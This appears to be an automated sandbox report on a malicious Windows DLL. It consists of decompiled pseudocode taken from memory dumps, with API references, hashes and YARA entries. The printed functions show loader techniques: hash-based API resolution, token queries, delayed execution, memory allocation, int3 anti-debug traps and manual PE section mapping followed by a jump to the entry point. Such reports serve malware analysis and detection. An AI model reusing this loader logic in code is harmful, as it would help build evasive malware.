							if(_t325 != 0) {
								_push(_t429 + 0x1a4);
								_push(0);
								_push(0);
								_push(1);
								_push( *(_t429 + 0x1ac));
								if( *_t325() == 0) {
									E6ED935F0(_t407);
								}
							}
							_t206 =  *(_t429 + 0x1a4);
							if( *(_t429 + 0x1a4) != 0) {
								E6ED8F584(_t429 + 0x18c, _t206);
								_t411 = E6ED9306C(0x150c05fc, 0xf2377aa1, 0x150c05fc, 0x150c05fc);
								__eflags = _t411;
								if(_t411 == 0) {
									L133:
									E6ED8F654(_t429 + 0x188);
									goto L72;
								}
								_t212 = E6ED8F4BC(_t429 + 0x18c, 0);
								_t213 = E6ED8F4CC(_t429 + 0x188);
								_t215 =  *_t411( *(_t429 + 0x1ac), 1, _t212, _t213, _t429 + 0x1a4);
								__eflags = _t215;
								if(_t215 == 0) {
									_t216 = E6ED935F0(_t411);
									__eflags = _t216;
									if(_t216 != 0) {
										goto L133;
									}
								}
								_t423 = E6ED8F4BC(_t429 + 0x18c, 0);
								E6ED8DF4C(_t429 + 0x1b4, 0);
								 *(_t429 + 0x1ac) = 0;
								_t377 = E6ED9306C(0x150c05fc, 0xfc1a24a1, 0x150c05fc, 0x150c05fc);
								__eflags = _t377;
								if(_t377 != 0) {
									 *_t377( *_t423, _t429 + 0x1ac);
								}
								E6ED8DFC0(_t429 + 0x1b4,  *(_t429 + 0x1ac));
								_t223 = E6ED9306C(0x8e844d1e, 0xda6a2597, 0x8e844d1e, 0x8e844d1e);
								__eflags = _t223;
								if(_t223 != 0) {
									_push( *(_t429 + 0x1ac));
									asm("int3");
									asm("int3");
								}
								E6ED8E06C(_t429 + 0x1b8 - 8, _t429 + 0x1b8);
								_t425 = E6ED94FFC( *((intOrPtr*)(_t429 + 0x1b8)), E6ED8E8A8( *((intOrPtr*)(_t429 + 0x1b8)), 0x7fffffff));
								E6ED8DFA4(_t429 + 0x1b8);
								E6ED8DFA4(_t429 + 0x1b0);
								E6ED8F654(_t429 + 0x188);
								__eflags =  *((char*)(_t429 + 0x34));
								if( *((char*)(_t429 + 0x34)) != 0) {
									E6ED8BB44(_t429 + 0x30);
								}
								__eflags = _t425 - 0x6df4cf7;
								if(_t425 != 0x6df4cf7) {
									goto L74;
								} else {
									 *((intOrPtr*)( *0x6ed9d1f8 + 0x2c)) = 6;
									goto L78;
								}
							} else {
								L72:
								if( *((char*)(_t429 + 0x34)) != 0) {
									E6ED8BB44(_t429 + 0x30);
								}
								goto L74;
							}
						}
					}
					_push(_t429 + 0x198);
					_push(8);
					_push(0xffffffff);
					if( *_t363() == 0) {
						_t259 = E6ED935F0(_t404);
						__eflags = _t259;
						if(_t259 != 0) {
							goto L12;
						}
					}
					 *(_t429 + 0x14) =  *(_t429 + 0x198);
					 *((char*)(_t429 + 0x18)) = 1;
					 *(_t429 + 0x1a0) = 0;
					if(E6ED9306C(0x150c05fc, 0xf2377aa1, 0x150c05fc, 0x150c05fc) != 0) {
						_t288 = GetTokenInformation( *(_t429 + 0x1a8), 2, 0, 0, _t429 + 0x1a0); // executed
						if(_t288 == 0) {
							E6ED935F0(_t404);
						}
					}
					_t262 =  *(_t429 + 0x1a0);
					if( *(_t429 + 0x1a0) != 0) {
						E6ED8F584(_t429 + 0x3c, _t262);
						_t265 = E6ED9306C(0x150c05fc, 0xf2377aa1, 0x150c05fc, 0x150c05fc);
						_t407 = _t265;
						__eflags = _t265;
						if(_t265 == 0) {
							L107:
							E6ED8F654(_t429 + 0x38);
							goto L10;
						}
						_t268 = E6ED8F4BC(_t429 + 0x3c, 0);
						_t271 = GetTokenInformation( *(_t429 + 0x1a8), 2, _t268, E6ED8F4CC(_t429 + 0x38), _t429 + 0x1a0); // executed
						__eflags = _t271;
						if(_t271 == 0) {
							_t272 = E6ED935F0(_t407);
							__eflags = _t272;
							if(_t272 != 0) {
								goto L107;
							}
						}
						_t427 = E6ED8F4BC(_t429 + 0x3c, 0);
						 *(_t429 + 0x1d8 - 0x30) = 0;
						asm("movsd");
						asm("movsb");
						asm("movsb");
						_t407 = E6ED9306C(0x150c05fc, 0x2351aaca, 0x150c05fc, 0x150c05fc);
						__eflags = _t407;
						if(_t407 == 0) {
							goto L107;
						}
						_t276 = _t429 + 0x1a8;
						_t277 =  *_t407(_t276 + 0x30, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0, _t276);
						__eflags = _t277;
						if(_t277 == 0) {
							_t278 = E6ED935F0(_t407);
							__eflags = _t278;
							if(_t278 != 0) {
								goto L107;
							}
						}
						_t403 =  *(_t429 + 0x1a8);
						__eflags =  *_t427;
						if( *_t427 <= 0) {
							L101:
							__eflags = _t403;
							if(_t403 == 0) {
								L103:
								_t393 = 1;
								L105:
								__eflags = _t393;
								if(_t393 == 0) {
									E6ED90FD4(_t403, _t407, _t403);
								}
								goto L107;
							}
							__eflags = _t403 - 0xffffffff;
							if(_t403 != 0xffffffff) {
								_t393 = 0;
								__eflags = 0;
								goto L105;
							}
							goto L103;
						}
						_t413 = 0;
						__eflags = 0;
						do {
							_t282 = E6ED9306C(0x150c05fc, 0xb4757511, 0x150c05fc, 0x150c05fc);
							__eflags = _t282;
							if(_t282 == 0) {
								goto L100;
							}
							_push( *((intOrPtr*)(_t427 + 4 + _t413 * 8)));
							_push( *(_t429 + 0x1ac));
							asm("int3");
							asm("int3");
							__eflags = _t282;
							if(_t282 == 0) {
								goto L100;
							}
							__eflags = _t403;
							if(_t403 == 0) {
								L93:
								_t395 = 1;
								L95:
								__eflags = _t395;
								if(_t395 == 0) {
									E6ED90FD4(_t403, _t413, _t403);
								}
								E6ED8F654(_t429 + 0x38);
								__eflags =  *((char*)(_t429 + 0x18));
								if( *((char*)(_t429 + 0x18)) != 0) {
									E6ED8BB44(_t429 + 0x14);
								}
								_t364 = 1;
								goto L13;
							}
							__eflags = _t403 - 0xffffffff;
							if(_t403 != 0xffffffff) {
								_t395 = 0;
								__eflags = 0;
								goto L95;
							}
							goto L93;
							L100:
							_t413 = _t413 + 1;
							__eflags = _t413 -  *_t427;
						} while (_t413 <  *_t427);
						goto L101;
					}
					L10:
					if( *((char*)(_t429 + 0x18)) != 0) {
						E6ED8BB44(_t429 + 0x14);
					}
					goto L12;
				} else {
					return _t155;
				}
			}

0x6ed9073f
0x6ed90741
0x6ed90748
0x6ed90fc7
0x6ed90fcd
0x6ed90fcd
0x6ed90752
0x6ed9075e
0x6ed9076a
0x6ed9076f
0x6ed9077c
0x6ed9078d
0x6ed9078f
0x6ed90790
0x6ed90791
0x6ed90791
0x6ed90792
0x6ed90796
0x6ed9079a
0x6ed9079f
0x6ed907a2
0x6ed907a8
0x6ed907c2
0x6ed907c9
0x6ed907cc
0x6ed907cf
0x6ed907d1
0x6ed907dd
0x6ed907ea
0x6ed907f7
0x6ed907fb
0x6ed90887
0x6ed90887
0x6ed90889
0x6ed9088d
0x6ed90898
0x6ed908ae
0x6ed908b1
0x6ed908b1
0x6ed908b5
0x6ed908be
0x6ed908c3
0x6ed908c3
0x6ed908c5
0x6ed908d6
0x6ed908f8
0x6ed908fa
0x6ed908fb
0x6ed908ff
0x6ed908ff
0x6ed90908
0x6ed90914
0x6ed9091d
0x6ed90933
0x6ed90943
0x6ed90948
0x6ed9094c
0x6ed90951
0x6ed90953
0x6ed909a3
0x6ed909b8
0x6ed909bc
0x6ed909c1
0x6ed909d2
0x6ed909e7
0x6ed909eb
0x6ed909f0
0x6ed909f2
0x6ed90a39
0x6ed90a3c
0x6ed90a8a
0x6ed90a8d
0x6ed90ace
0x6ed90ad2
0x6ed90ad7
0x6ed90adc
0x6ed90afb
0x6ed90afb
0x6ed90afb
0x6ed90afd
0x00000000
0x6ed90afd
0x6ed90ade
0x6ed90ae2
0x6ed90ae4
0x6ed90aeb
0x6ed90aeb
0x6ed90af1
0x6ed90af1
0x6ed90af3
0x6ed90af6
0x6ed90af6
0x00000000
0x6ed90af3
0x6ed90ae6
0x6ed90ae9
0x6ed90aef
0x6ed90aef
0x00000000
0x6ed90aef
0x00000000
0x6ed90ae9
0x6ed90a8f
0x6ed90a92
0x00000000
0x00000000
0x6ed90a98
0x6ed90a9d
0x6ed90aa2
0x6ed90ac1
0x6ed90ac1
0x6ed90acb
0x00000000
0x6ed90acb
0x6ed90aa4
0x6ed90aa8
0x6ed90aaa
0x6ed90ab1
0x6ed90ab1
0x6ed90ab7
0x6ed90ab7
0x6ed90ab9
0x6ed90abc
0x6ed90abc
0x00000000
0x6ed90ab9
0x6ed90aac
0x6ed90aaf
0x6ed90ab5
0x6ed90ab5
0x00000000
0x6ed90ab5
0x00000000
0x6ed90aaf
0x6ed90a3e
0x6ed90a40
0x6ed90a7f
0x6ed90a82
0x6ed90df4
0x6ed90df9
0x6ed90dfe
0x6ed90e1d
0x6ed90e1d
0x6ed90e27
0x00000000
0x6ed90e27
0x6ed90e00
0x6ed90e04
0x6ed90e06
0x6ed90e0d
0x6ed90e0d
0x6ed90e13
0x6ed90e13
0x6ed90e15
0x6ed90e18
0x6ed90e18
0x00000000
0x6ed90e15
0x6ed90e08
0x6ed90e0b
0x6ed90e11
0x6ed90e11
0x00000000
0x6ed90e11
0x00000000
0x6ed90e0b
0x00000000
0x6ed90a88
0x6ed90a46
0x6ed90a4b
0x6ed90a50
0x6ed90a6f
0x6ed90a6f
0x6ed90a79
0x00000000
0x6ed90a79
0x6ed90a52
0x6ed90a56
0x6ed90a58
0x6ed90a5f
0x6ed90a5f
0x6ed90a65
0x6ed90a65
0x6ed90a67
0x6ed90a6a
0x6ed90a6a
0x00000000
0x6ed90a67
0x6ed90a5a
0x6ed90a5d
0x6ed90a63
0x6ed90a63
0x00000000
0x6ed90a63
0x00000000
0x6ed90a5d
0x6ed909f4
0x6ed909f6
0x00000000
0x00000000
0x6ed90a00
0x6ed90a05
0x6ed90a0a
0x6ed90a29
0x6ed90a29
0x6ed90a33
0x00000000
0x6ed90a33
0x6ed90a0c
0x6ed90a10
0x6ed90a12
0x6ed90a19
0x6ed90a19
0x6ed90a1f
0x6ed90a1f
0x6ed90a21
0x6ed90a24
0x6ed90a24
0x00000000
0x6ed90a21
0x6ed90a14
0x6ed90a17
0x6ed90a1d
0x6ed90a1d
0x00000000
0x6ed90a1d
0x00000000
0x6ed90a17
0x6ed90959
0x6ed9095e
0x6ed90963
0x6ed90982
0x6ed90982
0x6ed9098c
0x00000000
0x6ed9098c
0x6ed90965
0x6ed90969
0x6ed9096b
0x6ed90972
0x6ed90972
0x6ed90978
0x6ed90978
0x6ed9097a
0x6ed9097d
0x6ed9097d
0x00000000
0x6ed9097a
0x6ed9096d
0x6ed90970
0x6ed90976
0x6ed90976
0x00000000
0x6ed90976
0x00000000
0x6ed9089a
0x6ed9089c
0x6ed90b01
0x6ed90b06
0x6ed90b09
0x6ed90b0e
0x6ed90b10
0x6ed90b25
0x6ed90b28
0x6ed90bf6
0x6ed90bfe
0x6ed90c01
0x6ed90c16
0x6ed90c20
0x6ed90c20
0x6ed90c22
0x6ed90c24
0x6ed90c33
0x6ed90c3f
0x6ed90c43
0x6ed90c46
0x6ed90c49
0x6ed90c4c
0x00000000
0x6ed90c4c
0x6ed90b38
0x6ed90b4a
0x6ed90b4e
0x6ed90bda
0x6ed90bda
0x6ed90be0
0x6ed90beb
0x6ed90be2
0x6ed90be2
0x6ed90be2
0x00000000
0x6ed90be0
0x6ed90b5b
0x6ed90b5c
0x6ed90b5e
0x6ed90b64
0x6ed90fb3
0x6ed90fb8
0x6ed90fba
0x00000000
0x00000000
0x6ed90fc0
0x6ed90b7b
0x6ed90b7f
0x6ed90b84
0x6ed90b96
0x6ed90b9a
0x6ed90ba5
0x6ed90ba6
0x6ed90ba7
0x6ed90ba8
0x6ed90baa
0x6ed90bb5
0x6ed90e2d
0x6ed90e2d
0x6ed90bb5
0x6ed90bbb
0x6ed90bc4
0x6ed90e3f
0x6ed90e55
0x6ed90e57
0x6ed90e59
0x6ed90f94
0x6ed90f9b
0x00000000
0x6ed90f9b
0x6ed90e68
0x6ed90e76
0x6ed90e90
0x6ed90e92
0x6ed90e94
0x6ed90fa5
0x6ed90faa
0x6ed90fac
0x00000000
0x00000000
0x6ed90fae
0x6ed90ea8
0x6ed90eb3
0x6ed90ec2
0x6ed90ed4
0x6ed90ed6
0x6ed90ed8
0x6ed90ee5
0x6ed90ee5
0x6ed90ef5
0x6ed90f06
0x6ed90f0b
0x6ed90f0d
0x6ed90f0f
0x6ed90f16
0x6ed90f17
0x6ed90f17
0x6ed90f23
0x6ed90f44
0x6ed90f4d
0x6ed90f59
0x6ed90f65
0x6ed90f6a
0x6ed90f6f
0x6ed90f75
0x6ed90f75
0x6ed90f7a
0x6ed90f80
0x00000000
0x6ed90f86
0x6ed90f88
0x00000000
0x6ed90f88
0x6ed90bca
0x6ed90bca
0x6ed90bcf
0x6ed90bd5
0x6ed90bd5
0x00000000
0x6ed90bcf
0x6ed90bc4
0x6ed90898
0x6ed90808
0x6ed90809
0x6ed9080b
0x6ed90811
0x6ed90dde
0x6ed90de3
0x6ed90de5
0x00000000
0x00000000
0x6ed90deb
0x6ed90828
0x6ed9082c
0x6ed90831
0x6ed90847
0x6ed9085e
0x6ed90862
0x6ed90c5a
0x6ed90c5a
0x6ed90862
0x6ed90868
0x6ed90871
0x6ed90c69
0x6ed90c7a
0x6ed90c7f
0x6ed90c81
0x6ed90c83
0x6ed90db4
0x6ed90db8
0x00000000
0x6ed90db8
0x6ed90c8f
0x6ed90cb4
0x6ed90cb6
0x6ed90cb8
0x6ed90dd0
0x6ed90dd5
0x6ed90dd7
0x00000000
0x00000000
0x6ed90dd9
0x6ed90cc9
0x6ed90cd7
0x6ed90cde
0x6ed90cdf
0x6ed90ce0
0x6ed90cf2
0x6ed90cf4
0x6ed90cf6
0x00000000
0x00000000
0x6ed90cfe
0x6ed90d19
0x6ed90d1b
0x6ed90d1d
0x6ed90dc2
0x6ed90dc7
0x6ed90dc9
0x00000000
0x00000000
0x6ed90dcb
0x6ed90d23
0x6ed90d2a
0x6ed90d2e
0x6ed90d99
0x6ed90d99
0x6ed90d9b
0x6ed90da2
0x6ed90da2
0x6ed90da8
0x6ed90da8
0x6ed90daa
0x6ed90daf
0x6ed90daf
0x00000000
0x6ed90daa
0x6ed90d9d
0x6ed90da0
0x6ed90da6
0x6ed90da6
0x00000000
0x6ed90da6
0x00000000
0x6ed90da0
0x6ed90d30
0x6ed90d30
0x6ed90d32
0x6ed90d3e
0x6ed90d43
0x6ed90d45
0x00000000
0x00000000
0x6ed90d47
0x6ed90d4b
0x6ed90d52
0x6ed90d53
0x6ed90d54
0x6ed90d56
0x00000000
0x00000000
0x6ed90d58
0x6ed90d5a
0x6ed90d61
0x6ed90d61
0x6ed90d67
0x6ed90d67
0x6ed90d69
0x6ed90d6e
0x6ed90d6e
0x6ed90d77
0x6ed90d7c
0x6ed90d81
0x6ed90d87
0x6ed90d87
0x6ed90d8c
0x00000000
0x6ed90d8c
0x6ed90d5c
0x6ed90d5f
0x6ed90d65
0x6ed90d65
0x00000000
0x6ed90d65
0x00000000
0x6ed90d93
0x6ed90d93
0x6ed90d94
0x6ed90d94
0x00000000
0x6ed90d32
0x6ed90877
0x6ed9087c
0x6ed90882
0x6ed90882
0x00000000
0x6ed90c59
0x6ed90c59
0x6ed90c59

APIs

GetTokenInformation.KERNELBASE(?,00000002,00000000,00000000,00000000,150C05FC,150C05FC), ref: 6ED9085E
GetSystemInfo.KERNELBASE(?,8E844D1E,8E844D1E,?,?,360D0C74,?,?,1E55AAEC,?,?,C0092A94,00000000,80000002,00000000,-000000FC), ref: 6ED90C20
GetTokenInformation.KERNELBASE(?,00000002,00000000,00000000,00000000,00000000,150C05FC,150C05FC,00000000,150C05FC,150C05FC), ref: 6ED90CB4

Memory Dump Source

Source File: 00000000.00000002.627740230.000000006ED81000.00000020.00020000.sdmp, Offset: 6ED80000, based on PE: true

Associated: 00000000.00000002.627724979.000000006ED80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.627787395.000000006ED9A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.627811416.000000006ED9D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.627821658.000000006ED9F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: InformationToken$InfoSystem
String ID:
API String ID: 298373132-0
Opcode ID: f03000230d26d303286c6f829ec7b00a049f161ab7eba0bf5831a20dc09260a2
Instruction ID: 9375e3ee1c1b2d495d48c2d7f12c4a0361d3160ceb32809708821554bd308090
Opcode Fuzzy Hash: f03000230d26d303286c6f829ec7b00a049f161ab7eba0bf5831a20dc09260a2
Instruction Fuzzy Hash: 1222E770208341EFE760DBA4DC50BDF77A9AF81388F10891DE9989B195FB31D905E762

Uniqueness

Uniqueness Score: -1.00%

Function 6ED92234, Relevance: 1.5, APIs: 1, Instructions: 30
nativeCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E6ED92234(void* __ecx, intOrPtr __edx, void* __esi) {
				intOrPtr _v4;
				intOrPtr _v20;
				intOrPtr* _t5;
				intOrPtr _t11;
				intOrPtr* _t13;
				intOrPtr* _t15;

				_t11 = __edx;
				if(__ecx == 0) {
					 *_t15 = 0;
					_v4 = 0;
				} else {
					 *_t15 = E6ED93AF8(0xffffd8f0, 0xffffffff, __ecx, 0);
					_v20 = _t11;
				}
				_t5 = E6ED9306C(0x60a28c5c, 0x11cab064, 0x60a28c5c, 0x60a28c5c);
				_t13 = _t5;
				if(_t13 != 0) {
					_t5 =  *_t13(0, _t15); // executed
				}
				return _t5;
			}

0x6ed92234
0x6ed92238
0x6ed92254
0x6ed92257
0x6ed9223a
0x6ed92249
0x6ed9224c
0x6ed9224c
0x6ed92267
0x6ed9226c
0x6ed92270
0x6ed92278
0x6ed92278
0x6ed9227c

APIs

NtDelayExecution.NTDLL(00000000,00000000,60A28C5C,60A28C5C,FFFFFFFF,FFFFFFFF,6ED84B17,00000000,00000000,?), ref: 6ED92278

Memory Dump Source

Source File: 00000000.00000002.627740230.000000006ED81000.00000020.00020000.sdmp, Offset: 6ED80000, based on PE: true

Associated: 00000000.00000002.627724979.000000006ED80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.627787395.000000006ED9A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.627811416.000000006ED9D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.627821658.000000006ED9F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: DelayExecution
String ID:
API String ID: 1249177460-0
Opcode ID: 2c9c5e460e6a6f6e58fad2ac9a5298f00f0cc66bf3291dc41720851ba70b474b
Instruction ID: 159d1b1639a0d2a8f90e6dcb34536cbae7c0d2b72ec87ffd6a9b1712eb8a149c
Opcode Fuzzy Hash: 2c9c5e460e6a6f6e58fad2ac9a5298f00f0cc66bf3291dc41720851ba70b474b
Instruction Fuzzy Hash: 9EE065B020E302ADE7449BA8AD05F6B36DCAF84614F208A2CB468D7184E670D8019371

Uniqueness

Uniqueness Score: -1.00%

Function 6ED92820, Relevance: 1.5, APIs: 1, Instructions: 29
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6ED92820(void* __ecx, long __edx, void* __esi, long _a4, long _a8, void* _a12) {
				long _v4;
				void* _t8;
				long _t10;
				PVOID* _t19;

				_v4 = __edx;
				 *_t19 = __ecx;
				if(E6ED9306C(0x60a28c5c, 0x414fdf7, 0x60a28c5c, 0x60a28c5c) == 0) {
					L3:
					_t8 =  *_t19;
				} else {
					_t10 = NtAllocateVirtualMemory(_a12, _t19, 0,  &_v4, _a4, _a8); // executed
					if(_t10 == 0) {
						goto L3;
					} else {
						_t8 = 0;
					}
				}
				return _t8;
			}

0x6ed92827
0x6ed92830
0x6ed9283e
0x6ed92861
0x6ed92861
0x6ed92840
0x6ed92857
0x6ed9285b
0x00000000
0x6ed9285d
0x6ed9285d
0x6ed9285d
0x6ed9285b
0x6ed92866

APIs

NtAllocateVirtualMemory.NTDLL(6ED988E6,?,00000000,000000FF,6ED988E6,6ED988E6,60A28C5C,60A28C5C,?,?,6ED988E6,00003000,00000004,000000FF), ref: 6ED92857

Memory Dump Source

Source File: 00000000.00000002.627740230.000000006ED81000.00000020.00020000.sdmp, Offset: 6ED80000, based on PE: true

Associated: 00000000.00000002.627724979.000000006ED80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.627787395.000000006ED9A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.627811416.000000006ED9D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.627821658.000000006ED9F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 1b6e0df76e67549dfb1e774fc107f98af224613b3e03ad2134b0c600fba901d1
Instruction ID: 2ef23583436f2a7d4a6a3460d64284f4e4effa7b7e68113467aecaafe04e33a6
Opcode Fuzzy Hash: 1b6e0df76e67549dfb1e774fc107f98af224613b3e03ad2134b0c600fba901d1
Instruction Fuzzy Hash: FDE03971209342EFEB08CB99DC24E6FB7E9EF84608F108C2DB498CA250D735D810A721

Uniqueness

Uniqueness Score: -1.00%

Function 6ED93138, Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E6ED93138(intOrPtr* __ecx) {
				void* _t1;

				_push(E6ED934B0);
				_push(1); // executed
				_t1 =  *__ecx(); // executed
				return _t1;
			}

0x6ed93138
0x6ed9313d
0x6ed9313f
0x6ed93141

APIs

RtlAddVectoredExceptionHandler.NTDLL(00000001,6ED934B0,6ED93128,60A28C5C,60A28C5C,?,6ED86C99,00000000), ref: 6ED9313F

Memory Dump Source

Source File: 00000000.00000002.627740230.000000006ED81000.00000020.00020000.sdmp, Offset: 6ED80000, based on PE: true

Associated: 00000000.00000002.627724979.000000006ED80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.627787395.000000006ED9A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.627811416.000000006ED9D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.627821658.000000006ED9F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ExceptionHandlerVectored
String ID:
API String ID: 3310709589-0
Opcode ID: 4838f9b32cedd2f60411a2be9271f53eeb3bdfdac673fc26539c22030b90bedc
Instruction ID: 9084e9030eb503be8d12596d125e77dac50639a0aced7c67256f498e096fa7ec
Opcode Fuzzy Hash: 4838f9b32cedd2f60411a2be9271f53eeb3bdfdac673fc26539c22030b90bedc
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 00AC11ED, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 230
memoryCOMMON

Download Yara Rule

C-Code - Quality: 42%

			E00AC11ED(long __ebx, void* __edi, long __esi, intOrPtr* _a4) {
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				char _v44;
				intOrPtr* _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				void* _v68;
				char* _v72;
				int _v76;
				long _v80;
				long _v84;
				DWORD* _v88;
				intOrPtr _v92;
				int _v96;
				intOrPtr* _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				void* _v112;
				intOrPtr _v116;
				char* _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				signed int _v160;
				signed int _v164;
				intOrPtr _v168;
				int _v172;
				char* _v176;
				intOrPtr _v180;
				intOrPtr _v184;
				char _v188;
				intOrPtr* _t137;
				int _t143;
				int _t151;
				int _t155;
				int _t182;
				unsigned int _t199;
				intOrPtr _t221;
				intOrPtr _t223;
				void* _t231;
				intOrPtr _t234;
				void* _t241;
				intOrPtr _t245;
				intOrPtr _t252;
				DWORD* _t265;
				void* _t269;
				intOrPtr* _t272;
				intOrPtr* _t273;

				_t137 = _a4;
				_v44 = 0;
				_t241 =  *((intOrPtr*)(_t137 + 0x38));
				 *0xac4418 = 1;
				asm("movaps xmm0, [0xac3010]");
				asm("movups [0xac4428], xmm0");
				_v48 = _t137;
				_v52 =  *((intOrPtr*)(_t137 + 0x20));
				_v56 =  *((intOrPtr*)(_v48 + 0x1c));
				_v188 = _t241;
				_v184 =  *((intOrPtr*)(_t137 + 0x18));
				_v180 = 4;
				_v176 =  &_v44;
				_v60 =  *((intOrPtr*)(_v48 + 0xc));
				_v64 = 4;
				_v68 = _t241;
				_v72 =  &_v44;
				_t143 = VirtualProtect(__edi, __ebx, __esi, _t265); // executed
				_v76 = _t143;
				_v188 = _v68;
				_v184 = 0;
				_v180 =  *((intOrPtr*)(_v48 + 0x18));
				_v80 = 0x400;
				_v84 = 2;
				_v88 =  &_v44;
				_v92 = 0;
				E00AC2798();
				E00AC17A5(_v68,  *_v48, _v52);
				E00AC2798( *_v48, 0, _v52);
				_t151 = VirtualProtect(_v68, 0x400, 2, _v88); // executed
				_t272 = _t269 - 0x8c;
				_t231 = _v68;
				_t252 =  *((intOrPtr*)(_t231 + 0x3c));
				_v96 = _t151;
				_v100 = _v68 + 0x3c;
				_v104 = _t231;
				_v108 = _t252;
				if(_t252 != 0) {
					_v104 = _v68 + (_v108 + 0x0000ffff & 0x0000ffff) + 1;
				}
				_v144 = _v104;
				if(_v60 != 0) {
					_v148 = _v144 + 0x18 + ( *(_v144 + 0x14) & 0x0000ffff);
					_v152 = 0;
					while(1) {
						_t221 = _v148;
						_t199 =  *(_t221 + 0x24);
						_v156 = _v152;
						_v160 = _t199 >> 0x0000001e & 0x00000001;
						_v164 = _t199 >> 0x1f;
						_v188 = _v68 +  *((intOrPtr*)(_t221 + 0xc));
						_v184 =  *((intOrPtr*)(_t221 + 8));
						_v180 =  *((intOrPtr*)(0xac4418 + (_v160 << 4) + (_v164 << 3) + ((_t199 >> 0x0000001d & 0x00000001) << 2)));
						_v176 =  &_v44;
						_v168 = _t221;
						_t182 = VirtualProtect(??, ??, ??, ??); // executed
						_t272 = _t272 - 0x10;
						_t223 = _v156 + 1;
						_v172 = _t182;
						_v148 = _v168 + 0x28;
						_v152 = _t223;
						if(_t223 == _v60) {
							goto L5;
						}
					}
				}
				L5:
				 *_t272 = _v68;
				_v116 = _v68 +  *((intOrPtr*)(_v48 + 0x14));
				_t155 = DisableThreadLibraryCalls(??);
				_t273 = _t272 - 4;
				_t234 =  *_v100;
				_v140 = _t155;
				_v136 = _t234;
				_v112 = _v68;
				if(_t234 == 0) {
					L2:
					_t245 = _v48;
					_v40 =  *((intOrPtr*)(_t245 + 0x34));
					_v36 =  *((intOrPtr*)(_t245 + 8));
					_v32 =  *((intOrPtr*)(_t245 + 0x30));
					_v28 =  *((intOrPtr*)(_t245 + 0x28));
					_v24 =  *((intOrPtr*)(_t245 + 0x50));
					_v20 = _v116;
					 *_t273 = _t245;
					_v188 = 0;
					_v184 = 0x74;
					_v120 =  &_v40;
					_v124 = 0;
					_v128 = 0x74;
					_v132 =  *((intOrPtr*)(_v112 + 0x28));
					E00AC2798();
					if(_v132 != 0) {
						_t272 =  *((intOrPtr*)( &_v40 + 0x10));
						goto __eax;
					}
					return 1;
				} else {
					_v112 = _v68 + (_v136 + 0x0000ffff & 0x0000ffff) + 1;
					goto L2;
				}
			}

0x00ac11f9
0x00ac1207
0x00ac120e
0x00ac1211
0x00ac121b
0x00ac1222
0x00ac122c
0x00ac1232
0x00ac123b
0x00ac1244
0x00ac1247
0x00ac124b
0x00ac1253
0x00ac125a
0x00ac125d
0x00ac1260
0x00ac1263
0x00ac1266
0x00ac1280
0x00ac1286
0x00ac1289
0x00ac1291
0x00ac1295
0x00ac1298
0x00ac129b
0x00ac129e
0x00ac12a1
0x00ac12bc
0x00ac12d8
0x00ac12fd
0x00ac12ff
0x00ac1308
0x00ac130b
0x00ac1315
0x00ac1318
0x00ac131b
0x00ac131e
0x00ac1321
0x00ac1535
0x00ac1535
0x00ac143f
0x00ac1445
0x00ac140d
0x00ac1413
0x00ac146c
0x00ac1472
0x00ac1484
0x00ac1487
0x00ac1495
0x00ac14a6
0x00ac14cf
0x00ac14d2
0x00ac14d6
0x00ac14da
0x00ac14e1
0x00ac14e7
0x00ac14e9
0x00ac14f2
0x00ac1503
0x00ac1509
0x00ac150f
0x00ac1515
0x00000000
0x00000000
0x00ac151b
0x00ac146c
0x00ac13b8
0x00ac13c6
0x00ac13ce
0x00ac13d1
0x00ac13d3
0x00ac13d9
0x00ac13e5
0x00ac13eb
0x00ac13f1
0x00ac13f4
0x00ac132c
0x00ac133c
0x00ac1342
0x00ac1348
0x00ac134e
0x00ac1354
0x00ac135a
0x00ac1360
0x00ac1363
0x00ac1366
0x00ac136e
0x00ac1376
0x00ac1379
0x00ac137c
0x00ac137f
0x00ac1382
0x00ac138d
0x00ac1429
0x00ac142f
0x00ac142f
0x00ac1466
0x00ac13fa
0x00ac13b0
0x00000000
0x00ac13b0

APIs

VirtualProtect.KERNELBASE ref: 00AC1266
VirtualProtect.KERNELBASE ref: 00AC12FD
VirtualProtect.KERNELBASE ref: 00AC14E7

Strings

t, xrefs: 00AC136E

Memory Dump Source

Source File: 00000000.00000002.621607284.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Similarity

API ID: ProtectVirtual
String ID: t
API String ID: 544645111-2238339752
Opcode ID: c40c08144997b60c4ea53747b7b871637c1ae80dd3cb3e6d9e2e565a80ada299
Instruction ID: 4d6ae2a8dac6a7402fae8e8ea8a617cce27c64794708a4d05b1030e468a74ea1
